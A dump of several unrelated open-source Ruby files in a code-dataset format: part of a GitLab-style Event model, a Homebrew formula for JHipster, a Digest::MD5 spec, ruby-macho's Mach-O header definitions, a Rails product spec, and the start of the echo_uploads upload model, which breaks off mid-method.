target.respond_to?(:iid) ? target.iid : target_id
end
def commit_note?
note? && target && target.for_commit?
end
def issue_note?
note? && target && target.for_issue?
end
def merge_request_note?
note? && target && target.for_merge_request?
end
def project_snippet_note?
note? && target && target.for_snippet?
end
def personal_snippet_note?
note? && target && target.for_personal_snippet?
end
def note_target
target.noteable
end
def note_target_id
if commit_note?
target.commit_id
else
target.noteable_id.to_s
end
end
def note_target_reference
return unless note_target
# Commit#to_reference returns the full SHA, but we want the short one here
if commit_note?
note_target.short_id
else
note_target.to_reference
end
end
def note_target_type
if target.noteable_type.present?
target.noteable_type.titleize
else
"Wall"
end.downcase
end
def body?
if push?
push_with_commits?
elsif note?
true
else
target.respond_to? :title
end
end
def reset_project_activity
return unless project
# Don't bother updating if we know the project was updated recently.
return if recent_update?
# At this point it's possible for multiple threads/processes to try to
# update the project. Only one query should actually perform the update,
# hence we add the extra WHERE clause for last_activity_at.
Project.unscoped.where(id: project_id)
.where('last_activity_at <= ?', RESET_PROJECT_ACTIVITY_INTERVAL.ago)
.update_all(last_activity_at: created_at)
end
def authored_by?(user)
user ? author_id == user.id : false
end
def to_partial_path
# We are intentionally using `Event` rather than `self.class` so that
# subclasses also use the `Event` implementation.
Event._to_partial_path
end
private
def push_action_name
if new_ref?
"pushed new"
elsif rm_ref?
"deleted"
else
"pushed to"
end
end
def created_project_action_name
if project.external_import?
"imported"
else
"created"
end
end
def recent_update?
project.last_activity_at > RESET_PROJECT_ACTIVITY_INTERVAL.ago
end
def set_last_repository_updated_at
Project.unscoped.where(id: project_id)
.where("last_repository_updated_at < ? OR last_repository_updated_at IS NULL", REPOSITORY_UPDATED_AT_INTERVAL.ago)
.update_all(last_repository_updated_at: created_at)
end
def track_user_interacted_projects
# Note the call to .available? is due to earlier migrations
# that would otherwise conflict with the call to .track
# (because the table does not exist yet).
UserInteractedProject.track(self) if UserInteractedProject.available?
end
end
| 23.004878 | 120 | 0.673346 |
e838aefc5429de1848bdcdff6967c5d5f0189ece
| 1,229 |
require "language/node"
class Jhipster < Formula
desc "Generate, develop and deploy Spring Boot + Angular/React applications"
homepage "https://www.jhipster.tech/"
url "https://registry.npmjs.org/generator-jhipster/-/generator-jhipster-7.0.0.tgz"
sha256 "cbb84ce61223bdb92e11e36b9c48525830f9e29f570377f57f4501ee3f7da304"
license "Apache-2.0"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "edf9a4827d0ba3e318dcdbe37e691d1dae0f9a83d74ee2aae58184934b6ce2e8"
sha256 cellar: :any_skip_relocation, big_sur: "383a62d2521975cde135e326f678ea3b636271bdad39f6b36c53e261d5e413ad"
sha256 cellar: :any_skip_relocation, catalina: "d18017c4fb21fc3076b0360372f9ff8e14260399f00caddd948ef3220fa77f78"
sha256 cellar: :any_skip_relocation, mojave: "a5f8fcb7dfd53f388d8866976fb296a4772bd8d6ef5b751bc9344fe75e73c189"
end
depends_on "node"
depends_on "openjdk"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install Dir["#{libexec}/bin/*"]
bin.env_script_all_files libexec/"bin", Language::Java.overridable_java_home_env
end
test do
assert_match "execution is complete", shell_output("#{bin}/jhipster info")
end
end
| 40.966667 | 122 | 0.785191 |
2684f50373b714261f697c4c8dff51f657b49814
| 1,276 |
require_relative '../../../spec_helper'
require_relative 'shared/constants'
require_relative '../../../core/file/shared/read'
describe "Digest::MD5.file" do
describe "when passed a path to a file that exists" do
before :each do
@file = tmp("md5_temp")
touch(@file, 'wb') {|f| f.write MD5Constants::Contents }
end
after :each do
rm_r @file
end
it "returns a Digest::MD5 object" do
Digest::MD5.file(@file).should be_kind_of(Digest::MD5)
end
it "returns a Digest::MD5 object with the correct digest" do
Digest::MD5.file(@file).digest.should == MD5Constants::Digest
end
it "calls #to_str on an object and returns the Digest::MD5 with the result" do
obj = mock("to_str")
obj.should_receive(:to_str).and_return(@file)
result = Digest::MD5.file(obj)
result.should be_kind_of(Digest::MD5)
result.digest.should == MD5Constants::Digest
end
end
it_behaves_like :file_read_directory, :file, Digest::MD5
it "raises a Errno::ENOENT when passed a path that does not exist" do
lambda { Digest::MD5.file("") }.should raise_error(Errno::ENOENT)
end
it "raises a TypeError when passed nil" do
lambda { Digest::MD5.file(nil) }.should raise_error(TypeError)
end
end
| 29 | 82 | 0.672414 |
1af5822abf67e9673563d1bc74ec737b46c66d2c
| 21,794 |
module MachO
# Classes and constants for parsing the headers of Mach-O binaries.
module Headers
# big-endian fat magic
# @api private
FAT_MAGIC = 0xcafebabe
# little-endian fat magic
# @note This is defined for completeness, but should never appear in ruby-macho code,
# since fat headers are always big-endian.
# @api private
FAT_CIGAM = 0xbebafeca
# 64-bit big-endian fat magic
FAT_MAGIC_64 = 0xcafebabf
# 64-bit little-endian fat magic
# @note This is defined for completeness, but should never appear in ruby-macho code,
# since fat headers are always big-endian.
FAT_CIGAM_64 = 0xbfbafeca
# 32-bit big-endian magic
# @api private
MH_MAGIC = 0xfeedface
# 32-bit little-endian magic
# @api private
MH_CIGAM = 0xcefaedfe
# 64-bit big-endian magic
# @api private
MH_MAGIC_64 = 0xfeedfacf
# 64-bit little-endian magic
# @api private
MH_CIGAM_64 = 0xcffaedfe
# association of magic numbers to string representations
# @api private
MH_MAGICS = {
FAT_MAGIC => "FAT_MAGIC",
FAT_MAGIC_64 => "FAT_MAGIC_64",
MH_MAGIC => "MH_MAGIC",
MH_CIGAM => "MH_CIGAM",
MH_MAGIC_64 => "MH_MAGIC_64",
MH_CIGAM_64 => "MH_CIGAM_64",
}.freeze
# mask for CPUs with 64-bit architectures (when running a 64-bit ABI?)
# @api private
CPU_ARCH_ABI64 = 0x01000000
# mask for CPUs with 64-bit architectures (when running a 32-bit ABI?)
# @see https://github.com/Homebrew/ruby-macho/issues/113
# @api private
CPU_ARCH_ABI32 = 0x02000000
# any CPU (unused?)
# @api private
CPU_TYPE_ANY = -1
# m68k compatible CPUs
# @api private
CPU_TYPE_MC680X0 = 0x06
# i386 and later compatible CPUs
# @api private
CPU_TYPE_I386 = 0x07
# x86_64 (AMD64) compatible CPUs
# @api private
CPU_TYPE_X86_64 = (CPU_TYPE_I386 | CPU_ARCH_ABI64)
# 32-bit ARM compatible CPUs
# @api private
CPU_TYPE_ARM = 0x0c
# m88k compatible CPUs
# @api private
CPU_TYPE_MC88000 = 0xd
# 64-bit ARM compatible CPUs
# @api private
CPU_TYPE_ARM64 = (CPU_TYPE_ARM | CPU_ARCH_ABI64)
# 64-bit ARM compatible CPUs (running in 32-bit mode?)
# @see https://github.com/Homebrew/ruby-macho/issues/113
CPU_TYPE_ARM64_32 = (CPU_TYPE_ARM | CPU_ARCH_ABI32)
# PowerPC compatible CPUs
# @api private
CPU_TYPE_POWERPC = 0x12
# PowerPC64 compatible CPUs
# @api private
CPU_TYPE_POWERPC64 = (CPU_TYPE_POWERPC | CPU_ARCH_ABI64)
# association of cpu types to symbol representations
# @api private
CPU_TYPES = {
CPU_TYPE_ANY => :any,
CPU_TYPE_I386 => :i386,
CPU_TYPE_X86_64 => :x86_64,
CPU_TYPE_ARM => :arm,
CPU_TYPE_ARM64 => :arm64,
CPU_TYPE_ARM64_32 => :arm64_32,
CPU_TYPE_POWERPC => :ppc,
CPU_TYPE_POWERPC64 => :ppc64,
}.freeze
# mask for CPU subtype capabilities
# @api private
CPU_SUBTYPE_MASK = 0xff000000
# 64-bit libraries (undocumented!)
# @see http://llvm.org/docs/doxygen/html/Support_2MachO_8h_source.html
# @api private
CPU_SUBTYPE_LIB64 = 0x80000000
# the lowest common sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_I386 = 3
# the i486 sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_486 = 4
# the i486SX sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_486SX = 132
# the i586 (P5, Pentium) sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_586 = 5
# @see CPU_SUBTYPE_586
# @api private
CPU_SUBTYPE_PENT = CPU_SUBTYPE_586
# the Pentium Pro (P6) sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_PENTPRO = 22
# the Pentium II (P6, M3?) sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_PENTII_M3 = 54
# the Pentium II (P6, M5?) sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_PENTII_M5 = 86
# the Pentium 4 (Netburst) sub-type for `CPU_TYPE_I386`
# @api private
CPU_SUBTYPE_PENTIUM_4 = 10
# the lowest common sub-type for `CPU_TYPE_MC680X0`
# @api private
CPU_SUBTYPE_MC680X0_ALL = 1
# @see CPU_SUBTYPE_MC680X0_ALL
# @api private
CPU_SUBTYPE_MC68030 = CPU_SUBTYPE_MC680X0_ALL
# the 040 subtype for `CPU_TYPE_MC680X0`
# @api private
CPU_SUBTYPE_MC68040 = 2
# the 030 subtype for `CPU_TYPE_MC680X0`
# @api private
CPU_SUBTYPE_MC68030_ONLY = 3
# the lowest common sub-type for `CPU_TYPE_X86_64`
# @api private
CPU_SUBTYPE_X86_64_ALL = CPU_SUBTYPE_I386
# the Haskell sub-type for `CPU_TYPE_X86_64`
# @api private
CPU_SUBTYPE_X86_64_H = 8
# the lowest common sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_ALL = 0
# the v4t sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V4T = 5
# the v6 sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V6 = 6
# the v5 sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V5TEJ = 7
# the xscale (v5 family) sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_XSCALE = 8
# the v7 sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7 = 9
# the v7f (Cortex A9) sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7F = 10
# the v7s ("Swift") sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7S = 11
# the v7k ("Kirkwood40") sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7K = 12
# the v6m sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V6M = 14
# the v7m sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7M = 15
# the v7em sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V7EM = 16
# the v8 sub-type for `CPU_TYPE_ARM`
# @api private
CPU_SUBTYPE_ARM_V8 = 13
# the lowest common sub-type for `CPU_TYPE_ARM64`
# @api private
CPU_SUBTYPE_ARM64_ALL = 0
# the v8 sub-type for `CPU_TYPE_ARM64`
# @api private
CPU_SUBTYPE_ARM64_V8 = 1
# the v8 sub-type for `CPU_TYPE_ARM64_32`
# @api private
CPU_SUBTYPE_ARM64_32_V8 = 1
# the lowest common sub-type for `CPU_TYPE_MC88000`
# @api private
CPU_SUBTYPE_MC88000_ALL = 0
# @see CPU_SUBTYPE_MC88000_ALL
# @api private
CPU_SUBTYPE_MMAX_JPC = CPU_SUBTYPE_MC88000_ALL
# the 100 sub-type for `CPU_TYPE_MC88000`
# @api private
CPU_SUBTYPE_MC88100 = 1
# the 110 sub-type for `CPU_TYPE_MC88000`
# @api private
CPU_SUBTYPE_MC88110 = 2
# the lowest common sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_ALL = 0
# the 601 sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_601 = 1
# the 602 sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_602 = 2
# the 603 sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_603 = 3
# the 603e (G2) sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_603E = 4
# the 603ev sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_603EV = 5
# the 604 sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_604 = 6
# the 604e sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_604E = 7
# the 620 sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_620 = 8
# the 750 (G3) sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_750 = 9
# the 7400 (G4) sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_7400 = 10
# the 7450 (G4 "Voyager") sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_7450 = 11
# the 970 (G5) sub-type for `CPU_TYPE_POWERPC`
# @api private
CPU_SUBTYPE_POWERPC_970 = 100
# any CPU sub-type for CPU type `CPU_TYPE_POWERPC64`
# @api private
CPU_SUBTYPE_POWERPC64_ALL = CPU_SUBTYPE_POWERPC_ALL
# association of CPU types/subtype pairs to symbol representations in
# (very) roughly descending order of commonness
# @see https://opensource.apple.com/source/cctools/cctools-877.8/libstuff/arch.c
# @api private
CPU_SUBTYPES = {
CPU_TYPE_I386 => {
CPU_SUBTYPE_I386 => :i386,
CPU_SUBTYPE_486 => :i486,
CPU_SUBTYPE_486SX => :i486SX,
CPU_SUBTYPE_586 => :i586, # also "pentium" in arch(3)
CPU_SUBTYPE_PENTPRO => :i686, # also "pentpro" in arch(3)
CPU_SUBTYPE_PENTII_M3 => :pentIIm3,
CPU_SUBTYPE_PENTII_M5 => :pentIIm5,
CPU_SUBTYPE_PENTIUM_4 => :pentium4,
}.freeze,
CPU_TYPE_X86_64 => {
CPU_SUBTYPE_X86_64_ALL => :x86_64,
CPU_SUBTYPE_X86_64_H => :x86_64h,
}.freeze,
CPU_TYPE_ARM => {
CPU_SUBTYPE_ARM_ALL => :arm,
CPU_SUBTYPE_ARM_V4T => :armv4t,
CPU_SUBTYPE_ARM_V6 => :armv6,
CPU_SUBTYPE_ARM_V5TEJ => :armv5,
CPU_SUBTYPE_ARM_XSCALE => :xscale,
CPU_SUBTYPE_ARM_V7 => :armv7,
CPU_SUBTYPE_ARM_V7F => :armv7f,
CPU_SUBTYPE_ARM_V7S => :armv7s,
CPU_SUBTYPE_ARM_V7K => :armv7k,
CPU_SUBTYPE_ARM_V6M => :armv6m,
CPU_SUBTYPE_ARM_V7M => :armv7m,
CPU_SUBTYPE_ARM_V7EM => :armv7em,
CPU_SUBTYPE_ARM_V8 => :armv8,
}.freeze,
CPU_TYPE_ARM64 => {
CPU_SUBTYPE_ARM64_ALL => :arm64,
CPU_SUBTYPE_ARM64_V8 => :arm64v8,
}.freeze,
CPU_TYPE_ARM64_32 => {
CPU_SUBTYPE_ARM64_32_V8 => :arm64_32v8,
}.freeze,
CPU_TYPE_POWERPC => {
CPU_SUBTYPE_POWERPC_ALL => :ppc,
CPU_SUBTYPE_POWERPC_601 => :ppc601,
CPU_SUBTYPE_POWERPC_603 => :ppc603,
CPU_SUBTYPE_POWERPC_603E => :ppc603e,
CPU_SUBTYPE_POWERPC_603EV => :ppc603ev,
CPU_SUBTYPE_POWERPC_604 => :ppc604,
CPU_SUBTYPE_POWERPC_604E => :ppc604e,
CPU_SUBTYPE_POWERPC_750 => :ppc750,
CPU_SUBTYPE_POWERPC_7400 => :ppc7400,
CPU_SUBTYPE_POWERPC_7450 => :ppc7450,
CPU_SUBTYPE_POWERPC_970 => :ppc970,
}.freeze,
CPU_TYPE_POWERPC64 => {
CPU_SUBTYPE_POWERPC64_ALL => :ppc64,
# apparently the only exception to the naming scheme
CPU_SUBTYPE_POWERPC_970 => :ppc970_64,
}.freeze,
CPU_TYPE_MC680X0 => {
CPU_SUBTYPE_MC680X0_ALL => :m68k,
CPU_SUBTYPE_MC68030 => :mc68030,
CPU_SUBTYPE_MC68040 => :mc68040,
},
CPU_TYPE_MC88000 => {
CPU_SUBTYPE_MC88000_ALL => :m88k,
},
}.freeze
# relocatable object file
# @api private
MH_OBJECT = 0x1
# demand paged executable file
# @api private
MH_EXECUTE = 0x2
# fixed VM shared library file
# @api private
MH_FVMLIB = 0x3
# core dump file
# @api private
MH_CORE = 0x4
# preloaded executable file
# @api private
MH_PRELOAD = 0x5
# dynamically bound shared library
# @api private
MH_DYLIB = 0x6
# dynamic link editor
# @api private
MH_DYLINKER = 0x7
# dynamically bound bundle file
# @api private
MH_BUNDLE = 0x8
# shared library stub for static linking only, no section contents
# @api private
MH_DYLIB_STUB = 0x9
# companion file with only debug sections
# @api private
MH_DSYM = 0xa
# x86_64 kexts
# @api private
MH_KEXT_BUNDLE = 0xb
# association of filetypes to Symbol representations
# @api private
MH_FILETYPES = {
MH_OBJECT => :object,
MH_EXECUTE => :execute,
MH_FVMLIB => :fvmlib,
MH_CORE => :core,
MH_PRELOAD => :preload,
MH_DYLIB => :dylib,
MH_DYLINKER => :dylinker,
MH_BUNDLE => :bundle,
MH_DYLIB_STUB => :dylib_stub,
MH_DSYM => :dsym,
MH_KEXT_BUNDLE => :kext_bundle,
}.freeze
# association of mach header flag symbols to values
# @api private
MH_FLAGS = {
:MH_NOUNDEFS => 0x1,
:MH_INCRLINK => 0x2,
:MH_DYLDLINK => 0x4,
:MH_BINDATLOAD => 0x8,
:MH_PREBOUND => 0x10,
:MH_SPLIT_SEGS => 0x20,
:MH_LAZY_INIT => 0x40,
:MH_TWOLEVEL => 0x80,
:MH_FORCE_FLAT => 0x100,
:MH_NOMULTIDEFS => 0x200,
:MH_NOPREFIXBINDING => 0x400,
:MH_PREBINDABLE => 0x800,
:MH_ALLMODSBOUND => 0x1000,
:MH_SUBSECTIONS_VIA_SYMBOLS => 0x2000,
:MH_CANONICAL => 0x4000,
:MH_WEAK_DEFINES => 0x8000,
:MH_BINDS_TO_WEAK => 0x10000,
:MH_ALLOW_STACK_EXECUTION => 0x20000,
:MH_ROOT_SAFE => 0x40000,
:MH_SETUID_SAFE => 0x80000,
:MH_NO_REEXPORTED_DYLIBS => 0x100000,
:MH_PIE => 0x200000,
:MH_DEAD_STRIPPABLE_DYLIB => 0x400000,
:MH_HAS_TLV_DESCRIPTORS => 0x800000,
:MH_NO_HEAP_EXECUTION => 0x1000000,
:MH_APP_EXTENSION_SAFE => 0x02000000,
}.freeze
# Fat binary header structure
# @see MachO::FatArch
class FatHeader < MachOStructure
# @return [Integer] the magic number of the header (and file)
attr_reader :magic
# @return [Integer] the number of fat architecture structures following the header
attr_reader :nfat_arch
# always big-endian
# @see MachOStructure::FORMAT
# @api private
FORMAT = "N2".freeze
# @see MachOStructure::SIZEOF
# @api private
SIZEOF = 8
# @api private
def initialize(magic, nfat_arch)
@magic = magic
@nfat_arch = nfat_arch
end
# @return [String] the serialized fields of the fat header
def serialize
[magic, nfat_arch].pack(FORMAT)
end
# @return [Hash] a hash representation of this {FatHeader}
def to_h
{
"magic" => magic,
"magic_sym" => MH_MAGICS[magic],
"nfat_arch" => nfat_arch,
}.merge super
end
end
# 32-bit fat binary header architecture structure. A 32-bit fat Mach-O has one or more of
# these, indicating one or more internal Mach-O blobs.
# @note "32-bit" indicates the fact that this structure stores 32-bit offsets, not that the
# Mach-Os that it points to necessarily *are* 32-bit.
# @see MachO::Headers::FatHeader
class FatArch < MachOStructure
# @return [Integer] the CPU type of the Mach-O
attr_reader :cputype
# @return [Integer] the CPU subtype of the Mach-O
attr_reader :cpusubtype
# @return [Integer] the file offset to the beginning of the Mach-O data
attr_reader :offset
# @return [Integer] the size, in bytes, of the Mach-O data
attr_reader :size
# @return [Integer] the alignment, as a power of 2
attr_reader :align
# @note Always big endian.
# @see MachOStructure::FORMAT
# @api private
FORMAT = "L>5".freeze
# @see MachOStructure::SIZEOF
# @api private
SIZEOF = 20
# @api private
def initialize(cputype, cpusubtype, offset, size, align)
@cputype = cputype
@cpusubtype = cpusubtype & ~CPU_SUBTYPE_MASK
@offset = offset
@size = size
@align = align
end
# @return [String] the serialized fields of the fat arch
def serialize
[cputype, cpusubtype, offset, size, align].pack(FORMAT)
end
# @return [Hash] a hash representation of this {FatArch}
def to_h
{
"cputype" => cputype,
"cputype_sym" => CPU_TYPES[cputype],
"cpusubtype" => cpusubtype,
"cpusubtype_sym" => CPU_SUBTYPES[cputype][cpusubtype],
"offset" => offset,
"size" => size,
"align" => align,
}.merge super
end
end
# 64-bit fat binary header architecture structure. A 64-bit fat Mach-O has one or more of
# these, indicating one or more internal Mach-O blobs.
# @note "64-bit" indicates the fact that this structure stores 64-bit offsets, not that the
# Mach-Os that it points to necessarily *are* 64-bit.
# @see MachO::Headers::FatHeader
class FatArch64 < FatArch
# @return [void]
attr_reader :reserved
# @note Always big endian.
# @see MachOStructure::FORMAT
# @api private
FORMAT = "L>2Q>2L>2".freeze
# @see MachOStructure::SIZEOF
# @api private
SIZEOF = 32
# @api private
def initialize(cputype, cpusubtype, offset, size, align, reserved = 0)
super(cputype, cpusubtype, offset, size, align)
@reserved = reserved
end
# @return [String] the serialized fields of the fat arch
def serialize
[cputype, cpusubtype, offset, size, align, reserved].pack(FORMAT)
end
# @return [Hash] a hash representation of this {FatArch64}
def to_h
{
"reserved" => reserved,
}.merge super
end
end
# 32-bit Mach-O file header structure
class MachHeader < MachOStructure
# @return [Integer] the magic number
attr_reader :magic
# @return [Integer] the CPU type of the Mach-O
attr_reader :cputype
# @return [Integer] the CPU subtype of the Mach-O
attr_reader :cpusubtype
# @return [Integer] the file type of the Mach-O
attr_reader :filetype
# @return [Integer] the number of load commands in the Mach-O
attr_reader :ncmds
# @return [Integer] the size of all load commands, in bytes, in the Mach-O
attr_reader :sizeofcmds
# @return [Integer] the header flags associated with the Mach-O
attr_reader :flags
# @see MachOStructure::FORMAT
# @api private
FORMAT = "L=7".freeze
# @see MachOStructure::SIZEOF
# @api private
SIZEOF = 28
# @api private
def initialize(magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds,
flags)
@magic = magic
@cputype = cputype
# For now we're not interested in additional capability bits also to be
# found in the `cpusubtype` field. We only care about the CPU sub-type.
@cpusubtype = cpusubtype & ~CPU_SUBTYPE_MASK
@filetype = filetype
@ncmds = ncmds
@sizeofcmds = sizeofcmds
@flags = flags
end
# @example
# puts "this mach-o has position-independent execution" if header.flag?(:MH_PIE)
# @param flag [Symbol] a mach header flag symbol
# @return [Boolean] true if `flag` is present in the header's flag section
def flag?(flag)
flag = MH_FLAGS[flag]
return false if flag.nil?
flags & flag == flag
end
# @return [Boolean] whether or not the file is of type `MH_OBJECT`
def object?
filetype == Headers::MH_OBJECT
end
# @return [Boolean] whether or not the file is of type `MH_EXECUTE`
def executable?
filetype == Headers::MH_EXECUTE
end
# @return [Boolean] whether or not the file is of type `MH_FVMLIB`
def fvmlib?
filetype == Headers::MH_FVMLIB
end
# @return [Boolean] whether or not the file is of type `MH_CORE`
def core?
filetype == Headers::MH_CORE
end
# @return [Boolean] whether or not the file is of type `MH_PRELOAD`
def preload?
filetype == Headers::MH_PRELOAD
end
# @return [Boolean] whether or not the file is of type `MH_DYLIB`
def dylib?
filetype == Headers::MH_DYLIB
end
# @return [Boolean] whether or not the file is of type `MH_DYLINKER`
def dylinker?
filetype == Headers::MH_DYLINKER
end
# @return [Boolean] whether or not the file is of type `MH_BUNDLE`
def bundle?
filetype == Headers::MH_BUNDLE
end
# @return [Boolean] whether or not the file is of type `MH_DSYM`
def dsym?
filetype == Headers::MH_DSYM
end
# @return [Boolean] whether or not the file is of type `MH_KEXT_BUNDLE`
def kext?
filetype == Headers::MH_KEXT_BUNDLE
end
# @return [Boolean] true if the Mach-O has 32-bit magic, false otherwise
def magic32?
Utils.magic32?(magic)
end
# @return [Boolean] true if the Mach-O has 64-bit magic, false otherwise
def magic64?
Utils.magic64?(magic)
end
# @return [Integer] the file's internal alignment
def alignment
magic32? ? 4 : 8
end
# @return [Hash] a hash representation of this {MachHeader}
def to_h
{
"magic" => magic,
"magic_sym" => MH_MAGICS[magic],
"cputype" => cputype,
"cputype_sym" => CPU_TYPES[cputype],
"cpusubtype" => cpusubtype,
"cpusubtype_sym" => CPU_SUBTYPES[cputype][cpusubtype],
"filetype" => filetype,
"filetype_sym" => MH_FILETYPES[filetype],
"ncmds" => ncmds,
"sizeofcmds" => sizeofcmds,
"flags" => flags,
"alignment" => alignment,
}.merge super
end
end
# 64-bit Mach-O file header structure
class MachHeader64 < MachHeader
# @return [void]
attr_reader :reserved
# @see MachOStructure::FORMAT
# @api private
FORMAT = "L=8".freeze
# @see MachOStructure::SIZEOF
# @api private
SIZEOF = 32
# @api private
def initialize(magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds,
flags, reserved)
super(magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags)
@reserved = reserved
end
# @return [Hash] a hash representation of this {MachHeader64}
def to_h
{
"reserved" => reserved,
}.merge super
end
end
end
end
| 27.941026 | 95 | 0.629577 |
4a88832704ff903e9caefc6058e0aa483dc156eb
| 187 |
require 'rails_helper'
describe Product do
it { should validate_presence_of :name }
it { should validate_presence_of :cost }
it { should validate_presence_of :country_origin }
end
| 23.375 | 52 | 0.775401 |
11384a938a9692175c255e6eb2ff3fbf46c63c14
| 11,297 |
require 'base64'
require 'json'
require 'fileutils'
require 'securerandom'
module EchoUploads
module Model
extend ActiveSupport::Concern
included do
class_attribute :echo_uploads_config
include ::EchoUploads::Validation
include ::EchoUploads::PrmFileWriting
include ::EchoUploads::TmpFileWriting
end
def echo_uploads_data
Base64.encode64(JSON.dump(self.class.echo_uploads_config.inject({}) do |hash, (attr, cfg)|
metas = send("#{attr}_tmp_metadata")
if metas
hash[attr] = metas.map do |meta|
{'id' => meta.id, 'key' => meta.key}
end
end
hash
end)).strip
end
# Pass in a hash that's been encoded as JSON and then Base64.
def echo_uploads_data=(data)
parsed = JSON.parse Base64.decode64(data)
# parsed will look like:
# { 'attr1' => [ {'id' => 1, 'key' => 'abc...'} ] }
unless parsed.is_a? Hash
raise ArgumentError, "Invalid JSON structure in: #{parsed.inspect}"
end
parsed.each do |attr, attr_data|
# If the :map option was passed, there may be multiple variants of the uploaded
# file. Even if not, attr_data is still a one-element array.
unless attr_data.is_a? Array
raise ArgumentError, "Invalid JSON structure in: #{parsed.inspect}"
end
attr_data.each do |variant_data|
unless variant_data.is_a? Hash
raise ArgumentError, "Invalid JSON structure in: #{parsed.inspect}"
end
if meta = ::EchoUploads::File.where(
id: variant_data['id'], key: variant_data['key'], temporary: true
).first
if send("#{attr}_tmp_metadata").nil?
send "#{attr}_tmp_metadata=", []
end
send("#{attr}_tmp_metadata") << meta
end
end
end
end
# Helper method used internally by Echo Uploads.
def echo_uploads_map_metadata(attr, options)
meta = send("#{attr}_metadata")
meta ? yield(meta) : nil
end
module ClassMethods
# Options:
#
# - +key+: A Proc that takes an ActionDispatch::UploadedFile and returns a key
# uniquely identifying the file. If this option is not specified, the key is
# computed as the SHA-512 hash of the file contents. A digest of the file's
# contents should always be at least a part of the key.
#
# - +expires+: Length of time temporary files will be persisted. Defaults to
# +1.day+.
#
# - +storage+: A class that persists uploaded files to disk, to the cloud, or to
# wherever else you want. Defaults to +Rails.configuration.echo_uploads.storage+,
# which in turn is +EchoUploads::FilesystemStore+ by default.
#
# - +map+: A Proc that accepts an ActionDispatch::Htttp::UploadedFile and an
# instance of +EchoUploads::Mapper+. It should transform the file data (e.g.
# scaling an image). It should then write the transformed data to one of more
# temporary files. To get the temporary file path(s), call +#write+ on the
# +Mapper+. See readme.md for an example. The +:map+ option can also accept a
# symbol naming an an instance method that works the same way as the previously
# described Proc.
#
# - +multiple+: You use the +:map+ option to write multiple versions of the file.
# E.g. multiple thumbnail sizes. If you do so, you must pass +multiple: true+.
# This will make the association with +EchoUploads::File+ a +has_many+ instead of
# a +has_one+. The first file you write in the map function becomes the default.
# E.g.: Your model is called +Widget+, and the upload file attribute is called
# +photo+. You pass +:map+ with a method that writes three files. If you call
# +Widget#photo_path+, it will return the path to the first of the three files.
#
# - +write_tmp_file+: Normally, on a failed attempt to save the record, Echo Uploads
# writes a temp file. That way, the user can fix the validation errors without
# re-uploading the file. This option determines when the temp file is written. The
# default is +:after_rollback+, meaning the temp file is written on a failed
# attempt to save the record. Set to +false+ to turn off temp file saving. You can
# then save temp files manually by calling Set to +:after_validation+ and the temp
# file will be written on validation failure. (Warning: Although ActiveRecord
# implicitly validates before saving, it does so during a transaction. So setting
# this option to +:after_validation+ will prevent temp files being written during
# calls to +#save+ and similar methods.)
def echo_upload(attr, options = {})
options = {
expires: 1.day,
storage: Rails.configuration.echo_uploads.storage,
key: ::EchoUploads::File.default_key_proc,
write_tmp_file: :after_rollback
}.merge(options)
# Init the config object. We can't use [] syntax to set the hash key because
# class_attribute expects you to call the setter method every time the
# attribute value changes. (Merely calling [] would just mutate the referenced
# object, and wouldn't invoke the setter.)
self.echo_uploads_config ||= {}
self.echo_uploads_config = echo_uploads_config.merge attr => {}
# Define reader method for the file attribute.
if Rails::VERSION::MAJOR >= 5 and Rails::VERSION::MINOR >= 1
attribute attr
else
attr_reader attr
define_method("#{attr}=") do |file|
instance_variable_set "@#{attr}", file
if send(attr).present?
# Mark as dirty.
attribute_will_change! attr
end
end
end
# Define the accessor methods for the mapped version(s) of the file. Returns
# an array.
define_method("mapped_#{attr}") do
unless instance_variable_get("@mapped_#{attr}")
file = send attr
mapper = ::EchoUploads::Mapper.new file
if options[:map].is_a? Proc
options[:map].call file, mapper
else
send(options[:map], file, mapper)
end
# Write an array of ActionDispatch::Http::UploadedFile objects to the instance
# variable.
